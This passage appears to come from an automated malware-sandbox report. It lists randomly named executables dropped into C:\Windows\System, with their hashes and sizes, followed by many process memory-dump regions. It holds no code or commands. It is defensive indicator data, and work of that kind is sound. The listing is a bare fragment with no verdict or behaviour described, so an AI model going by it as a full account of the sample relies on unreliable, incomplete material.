d6a2bcbeec3054af2f85d33b45590a08be5c788d524642896e80302811d673177be5b231a3e900911026da07133b3b12f9bd8a874aff6250491964a6f16a7ff7

Download Submit
C:\Windows\System\wQALDiZ.exe

Filesize
3.1MB

MD5
b974a547e1463aa1e427f720726aa148

SHA1
65d48f45b2416337054b46a636795f2e0c6c8eb5

SHA256
0a2785c7fa5fabeea032f1fb50aa8fb269311918ad2a38c96559faca0e101662

SHA512
1e0838fc90c4e6a110f7a79d57301044ec25816b3b115a88cf178b9f918886c2630e9bd0b74c1783f042e928f843df17d27f4906dc785d36740e3ff5ad5ab256

Download Submit
C:\Windows\System\wYwxQXJ.exe

Filesize
3.1MB

MD5
236996714a9941226778121a1a8b3808

SHA1
cd119f7e3d25afb0cb6e9913de06f1e24de5a558

SHA256
2e51a9168d7aefce4f911ce3cb498eefeeffb2088fee10aab88febf87d6a840e

SHA512
848a9ef0767e58dd608706da3c4c08baa926be7d8b3d56aa2eae64b83ae828c03b7f659d9761ddc17fd9e5aa66b67e2a26412159c66397338d6e109b735d2760

Download Submit
C:\Windows\System\xZiMCws.exe

Filesize
3.1MB

MD5
f0d3b0df6cd67c876f0e99ddddd7a036

SHA1
05c3a34be13f67330a75664e4f3652aa6bf526ae

SHA256
9a78169e2fbdbfee8b54a78dfbe62d2bf3f2a97419c4d74aff5dab65fe6d6a02

SHA512
edef88ddab14ccdb8e68b7f2cd90c884db67571d4410c26a514b7112bbd820c69680758737f9ce5d1f8f285fb36b3d8683545e6bad0e26181a8024327dd3c521

Download Submit
C:\Windows\System\xZiMCws.exe

Filesize
192KB

MD5
e9e05f80b348f45549f92f6aeb1357ca

SHA1
49f6b502307ded78ce6cb78d7b1536cb40385ca7

SHA256
0375c4658e807090410d86e5599498f69cf1398651a798e68eea3ce2308420c5

SHA512
f5cf53e6e2f8ffd4d46b55b6f3e47c7fc0755f48b3a67c57c30412fe2803ee8d9847c5c20c74acfb4f08a93095d77e3b7e85b11a434aa08b3ec2766889b69b01

Download Submit
C:\Windows\System\yUAMmcn.exe

Filesize
3.1MB

MD5
1aa9a3f723919ad5fbd43b8742cb2f49

SHA1
d3ef191d4b1a45990e45d1bef28ea17419700580

SHA256
c05908c5f61b6322c9e7dfc2c6630e4cd7663d448994d9901165683e4c8ec155

SHA512
079e6c845e15b0e2c1f971efdc625c670e949ef4a7bea28f9fea0c036341d5e611ad6a5281edfc1557a31115be855821ce899f3f34588b09e28aa4cbbcf87ad5

Download Submit
C:\Windows\System\zvybAuk.exe

Filesize
3.1MB

MD5
331f500bb1ff36f7f28fb12a0f9cacdf

SHA1
d1a1559f891a8e0a8e9653d836daf49dac509904

SHA256
5246fdad0072c5798e6cc75e3070b6fc359da7b5ed260c7a09a3a636b34930a3

SHA512
713c832bbc449d02375d88b0ac0ad8e8152bda52bb094877dd3ed45741ae62a9443f33a7b4de289986a74640395f74b0fd975f7d7219e6677e5ac3ac42b6d9ec

Download Submit
memory/228-75-0x0000014B31FB0000-0x0000014B31FC0000-memory.dmp

Filesize
64KB

Download
memory/228-197-0x0000014B31FB0000-0x0000014B31FC0000-memory.dmp

Filesize
64KB

Download
memory/228-74-0x0000014B4A8C0000-0x0000014B4A8E2000-memory.dmp

Filesize
136KB

Download
memory/228-67-0x00007FFD6B320000-0x00007FFD6BDE1000-memory.dmp

Filesize
10.8MB

Download
memory/380-422-0x00007FF682550000-0x00007FF682946000-memory.dmp

Filesize
4.0MB

Download
memory/388-120-0x00007FF65CCA0000-0x00007FF65D096000-memory.dmp

Filesize
4.0MB

Download
memory/752-199-0x00007FF6ABE00000-0x00007FF6AC1F6000-memory.dmp

Filesize
4.0MB

Download
memory/876-142-0x00007FF6715F0000-0x00007FF6719E6000-memory.dmp

Filesize
4.0MB

Download
memory/1112-353-0x00007FF6F0650000-0x00007FF6F0A46000-memory.dmp

Filesize
4.0MB

Download
memory/1148-190-0x00007FF7FFA70000-0x00007FF7FFE66000-memory.dmp

Filesize
4.0MB

Download
memory/1212-225-0x00007FF727E40000-0x00007FF728236000-memory.dmp

Filesize
4.0MB

Download
memory/1348-192-0x00007FF606380000-0x00007FF606776000-memory.dmp

Filesize
4.0MB

Download
memory/1432-201-0x00007FF67D8D0000-0x00007FF67DCC6000-memory.dmp

Filesize
4.0MB

Download
memory/1608-187-0x00007FF7C5830000-0x00007FF7C5C26000-memory.dmp

Filesize
4.0MB

Download
memory/1712-151-0x00007FF700030000-0x00007FF700426000-memory.dmp

Filesize
4.0MB

Download
memory/1828-335-0x00007FF60A460000-0x00007FF60A856000-memory.dmp

Filesize
4.0MB

Download
memory/1844-202-0x00007FF72BC80000-0x00007FF72C076000-memory.dmp

Filesize
4.0MB

Download
memory/1852-348-0x00007FF6F46E0000-0x00007FF6F4AD6000-memory.dmp

Filesize
4.0MB

Download
memory/1928-191-0x00007FF7CC0A0000-0x00007FF7CC496000-memory.dmp

Filesize
4.0MB

Download
memory/2000-200-0x00007FF6B2100000-0x00007FF6B24F6000-memory.dmp

Filesize
4.0MB

Download
memory/2044-82-0x00007FF66E300000-0x00007FF66E6F6000-memory.dmp

Filesize
4.0MB

Download
memory/2076-194-0x00007FF76EA80000-0x00007FF76EE76000-memory.dmp

Filesize
4.0MB

Download
memory/2184-10-0x00007FF7B4510000-0x00007FF7B4906000-memory.dmp

Filesize
4.0MB

Download
memory/2212-354-0x00007FF7E3FD0000-0x00007FF7E43C6000-memory.dmp

Filesize
4.0MB

Download
memory/2260-349-0x00007FF6AF8C0000-0x00007FF6AFCB6000-memory.dmp

Filesize
4.0MB

Download
memory/2264-170-0x00007FF709DE0000-0x00007FF70A1D6000-memory.dmp

Filesize
4.0MB

Download
memory/2340-252-0x00007FF6C0FF0000-0x00007FF6C13E6000-memory.dmp

Filesize
4.0MB

Download
memory/2808-185-0x00007FF719080000-0x00007FF719476000-memory.dmp

Filesize
4.0MB

Download
memory/2896-195-0x00007FF62F150000-0x00007FF62F546000-memory.dmp

Filesize
4.0MB

Download
memory/2908-198-0x00007FF6180D0000-0x00007FF6184C6000-memory.dmp

Filesize
4.0MB

Download
memory/2924-184-0x00007FF662530000-0x00007FF662926000-memory.dmp

Filesize
4.0MB

Download
memory/2968-313-0x00007FF71E2B0000-0x00007FF71E6A6000-memory.dmp

Filesize
4.0MB

Download
memory/2996-229-0x00007FF65E850000-0x00007FF65EC46000-memory.dmp

Filesize
4.0MB

Download
memory/3244-398-0x00007FF6DF1B0000-0x00007FF6DF5A6000-memory.dmp

Filesize
4.0MB

Download
memory/3356-210-0x00007FF68F650000-0x00007FF68FA46000-memory.dmp

Filesize
4.0MB

Download
memory/3500-189-0x00007FF79C2B0000-0x00007FF79C6A6000-memory.dmp

Filesize
4.0MB

Download
memory/3660-365-0x00007FF7B6210000-0x00007FF7B6606000-memory.dmp

Filesize
4.0MB

Download
memory/3684-397-0x00007FF79AB60000-0x00007FF79AF56000-memory.dmp

Filesize
4.0MB

Download
memory/3704-355-0x00007FF7BBFE0000-0x00007FF7BC3D6000-memory.dmp

Filesize
4.0MB

Download
memory/3944-392-0x00007FF7D7260000-0x00007FF7D7656000-memory.dmp

Filesize
4.0MB

Download
memory/3952-100-0x00007FF6A4540000-0x00007FF6A4936000-memory.dmp

Filesize
4.0MB

Download
memory/4160-419-0x00007FF666670000-0x00007FF666A66000-memory.dmp

Filesize
4.0MB

Download
memory/4312-26-0x00007FF61F5A0000-0x00007FF61F996000-memory.dmp

Filesize
4.0MB

Download
memory/4400-278-0x00007FF76C580000-0x00007FF76C976000-memory.dmp

Filesize
4.0MB

Download
memory/4408-352-0x00007FF605270000-0x00007FF605666000-memory.dmp

Filesize
4.0MB

Download
memory/4448-188-0x00007FF78AAE0000-0x00007FF78AED6000-memory.dmp

Filesize
4.0MB

Download
memory/4476-159-0x00007FF719A50000-0x00007FF719E46000-memory.dmp

Filesize
4.0MB

Download
memory/4516-183-0x00007FF769D80000-0x00007FF76A176000-memory.dmp

Filesize
4.0MB

Download
memory/4564-0-0x00007FF7B62B0000-0x00007FF7B66A6000-memory.dmp

Filesize
4.0MB

Download
memory/4564-1-0x000001F5E2080000-0x000001F5E2090000-memory.dmp

Filesize
64KB

Download
memory/4692-294-0x00007FF637210000-0x00007FF637606000-memory.dmp

Filesize
4.0MB

Download
memory/4736-350-0x00007FF71CE00000-0x00007FF71D1F6000-memory.dmp

Filesize
4.0MB

Download
memory/4740-186-0x00007FF73A390000-0x00007FF73A786000-memory.dmp

Filesize
4.0MB

Download
memory/4804-196-0x00007FF7025E0000-0x00007FF7029D6000-memory.dmp

Filesize
4.0MB

Download
memory/4900-351-0x00007FF76E190000-0x00007FF76E586000-memory.dmp

Filesize
4.0MB

Download
memory/4952-193-0x00007FF6B91D0000-0x00007FF6B95C6000-memory.dmp

Filesize
4.0MB

Download
memory/5124-423-0x00007FF64F4A0000-0x00007FF64F896000-memory.dmp

Filesize
4.0MB

Download
memory/5140-424-0x00007FF699810000-0x00007FF699C06000-memory.dmp

Filesize
4.0MB

Download
memory/5188-425-0x00007FF76A3E0000-0x00007FF76A7D6000-memory.dmp

Filesize
4.0MB

Download
memory/5204-426-0x00007FF7012E0000-0x00007FF7016D6000-memory.dmp

Filesize
4.0MB

Download
memory/5220-427-0x00007FF74DFF0000-0x00007FF74E3E6000-memory.dmp

Filesize
4.0MB

Download
memory/5236-428-0x00007FF7077D0000-0x00007FF707BC6000-memory.dmp

Filesize
4.0MB

Download
memory/5260-429-0x00007FF6A50E0000-0x00007FF6A54D6000-memory.dmp

Filesize
4.0MB

Download
memory/5276-430-0x00007FF61EA60000-0x00007FF61EE56000-memory.dmp

Filesize
4.0MB

Download
memory/5292-431-0x00007FF74E8B0000-0x00007FF74ECA6000-memory.dmp

Filesize
4.0MB

Download